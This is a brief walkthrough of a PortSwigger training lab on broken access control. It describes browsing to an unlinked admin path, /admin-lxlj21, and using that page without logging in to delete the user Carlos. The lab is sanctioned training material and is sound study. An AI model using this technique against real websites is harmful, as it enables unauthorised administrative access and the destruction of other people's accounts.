In this post we will walk step by step through how to solve Unprotected admin functionality with unpredictable URL on PortSwigger. This lab’s difficulty is Apprentice and it is the second lab in the Access control labs on Portswigger.
To start the lab click the ‘Access the Lab’ button. A modern browser is all we need to solve this lab.
Starting the lab we are presented with a shop page that displays multiple categories. Don’t stress if your categories are different than the screenshot. PortSwigger Labs can change content each time the lab is started.
Navigating to /admin-lxlj21 we discover an unprotected admin functionality that allows an unauthenticated user to delete users.
Deleting the user Carlos solves the lab! Congratulations.
That completes the lab! Well done! If you found this helpful, please send me a tweet and tell me what you thought! Feedback is always appreciated!